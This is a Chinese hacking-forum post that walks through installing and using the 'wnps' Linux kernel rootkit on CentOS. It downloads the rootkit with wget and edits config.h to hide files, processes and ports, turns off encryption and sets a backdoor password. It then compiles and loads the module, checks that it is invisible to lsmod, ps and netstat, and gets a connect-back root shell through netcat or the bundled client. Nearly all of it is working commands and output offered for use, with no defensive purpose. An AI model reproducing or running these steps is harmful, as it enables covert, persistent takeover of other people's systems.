切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
371 国产 LKM RK wnps[复制链接]
发表于 2012-12-10 18:51:40 | 显示全部楼层 |!read_mode!

先备份CENTOS


下载


  1. [root@Centos ~]# wget http://lucky.fuzzexp.org/file/r00tk1t/wnps-0.26-beta2.tgz
  2. [root@Centos ~]# tar xf wnps-0.26-beta2.tgz
  3. [root@Centos ~]# cd wnps-0.26
  4. [root@Centos wnps-0.26]#
复制代码

注意config.h

  1. TCP_SHELL_KEY 表示要发送的主机密码,默认为@wztshell
  2. HIDE_FILE     表示我们将隐藏以HIDE_FILE字符为前缀的文件
  3. HIDE_TASK     表示我们将隐藏以HIDE_TASK字符为前缀的进程
  4. HIDE_STR       表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串

  5. HIDE_OPEN     表示我们将隐藏文件中位于HIDE_OPEN和HIDE_CLOSE之间的内容
  6. HIDE_CLOSE
复制代码

不使用加密传输不使用加密传输 NC能链接
需要编辑的是
1 #加密传输

  1. #define ENCRYPT         1
复制代码

改为
  1. #define ENCRYPT         0
复制代码

2. #密码
  1. #define TCP_SHELL_KEY   "@helen"     /* our passwd or flag used in nc or
  2. client */
复制代码

编译
  1. [root@Centos wnps]# make

  2. +--------------------------------------------------------------+
  3.                         WNPS Is Not Poc Shell                          
  4.                         Version 0.26  by wzt                           

  5. http://www.xsec.org

  6.                         Hacking Your Kernel                           
  7. +--------------------------------------------------------------+
  8. make -C /lib/modules/2.6.18-308.16.1.el5/build M=/root/wnps-0.26/wnps modules
  9. make[1]: Entering directory `/usr/src/kernels/2.6.18-308.16.1.el5-i686'
  10.   CC [M]  /root/wnps-0.26/wnps/hook.o
  11.   CC [M]  /root/wnps-0.26/wnps/kshell.o
  12.   LD [M]  /root/wnps-0.26/wnps/wnps.o
  13.   Building modules, stage 2.
  14.   MODPOST
  15.   CC      /root/wnps-0.26/wnps/wnps.mod.o
  16.   LD [M]  /root/wnps-0.26/wnps/wnps.ko
  17. make[1]: Leaving directory `/usr/src/kernels/2.6.18-308.16.1.el5-i686'
  18. [root@Centos wnps]#
复制代码

加载模块
  1. [root@Centos wnps]# make install
  2. insmod ./wnps.ko
  3. [root@Centos wnps]#
复制代码

微观隐藏
  1. [root@Centos wnps]# lsmod | grep wnps #无
  2. [root@Centos wnps]# ps -ef | grep wnps
  3. root      2510  2334  0 14:38 pts/0    00:00:00 grep wnps
  4. [root@Centos wnps]#
复制代码

隐藏不错关于链接SHELL 先扫描对方开放的任意端口
  1. brk<~> $ nmap -sT 5.5.5.6 -p 1-60000

  2. Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-25 14:42 CST
  3. Nmap scan report for Centos (5.5.5.6)
  4. Host is up (0.0042s latency).
  5. Not shown: 59997 closed ports
  6. PORT    STATE SERVICE
  7. 22/tcp  open  ssh
  8. 111/tcp open  rpcbind
  9. 728/tcp open  unknown

  10. Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
  11. brk<~> $
复制代码

然后发送特征 先本地监听一个端口
  1. brk<~> $ nc -vvlp 1234
  2. Listening on [0.0.0.0] (family 0, port 1234)
复制代码

链接任意TCP端口
  1. brk<~> $ nc -vv 5.5.5.6 22
  2. Connection to 5.5.5.6 22 port [tcp/sunrpc] succeeded!
复制代码

发送特征
  1. brk<~> $ nc -vv 5.5.5.6 22
  2. Connection to 5.5.5.6 22 port [tcp/ssh] succeeded!
  3. SSH-2.0-OpenSSH_4.3
  4. @helen:12345 #输入 回车
  5. Protocol mismatch.
  6. brk<~> $
复制代码

获得SHELL

来看看隐藏的情况 12345端口 无
  1. [root@Centos wnps]# netstat -antp | grep 12345
  2. [root@Centos wnps]# netstat -antp
  3. Active Internet connections (servers and established)
  4. Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
  5. tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1782/portmap        
  6. tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2093/cupsd         
  7. tcp        0      0 0.0.0.0:728                 0.0.0.0:*                   LISTEN      1818/rpc.statd      
  8. tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2132/sendmail: acce
  9. tcp        0      0 :::22                       :::*                        LISTEN      2080/sshd           
  10. tcp        0      0 ::ffff:5.5.5.6:22           ::ffff:5.5.5.1:33769        ESTABLISHED 2332/0              
  11. [root@Centos wnps]#
复制代码

看进程
  1. [root@Centos wnps]# ps -ef | grep ssh
  2. root      2080     1  0 14:30 ?        00:00:00 /usr/sbin/sshd
  3. root      2332  2080  0 14:33 ?        00:00:00 sshd: root@pts/0
  4. root      2542     1  0 14:44 ?        00:00:00 sshd: [accepted]
  5. root      2561  2334  0 14:49 pts/0    00:00:00 grep ssh
  6. [root@Centos wnps]#
复制代码

指定IP
发送特征的时候
  1. @helen:ip:端口
复制代码

然后那个IP进行监听使用加密传输如果 加密传输
  1. #define ENCRYPT         1
复制代码

默认是不关闭 不能用nc进行链接 需要本地下载wnps进行链接
进行make 编译出client 进行链接
  1. brk</tmp/wnps-0.26> $ ls
  2. CHANGES  client  license  readme-cn  todo  wnps
  3. brk</tmp/wnps-0.26> $ cd client/
  4. brk</tmp/wnps-0.26/client> $ make
  5. gcc -w -O2   -c -o interface.o interface.c
  6. gcc -w -O2   -c -o client.o client.c
  7. gcc -w -O2   -c -o socket.o socket.c
  8. gcc -o client interface.o client.o socket.o
  9. brk</tmp/wnps-0.26/client> $
复制代码

运行测试
  1. brk</tmp/wnps-0.26/client> $ ./client
  2. wnps client side v 1.0

  3. usage : ./client <options>

  4. <options>:
  5. -tcp|-packet <victim ip> [victim port] [connect back ip] [connect back port]
  6. -listen <port>
  7. brk</tmp/wnps-0.26/client> $
复制代码

不推荐使用这个方式



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-29 20:51

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部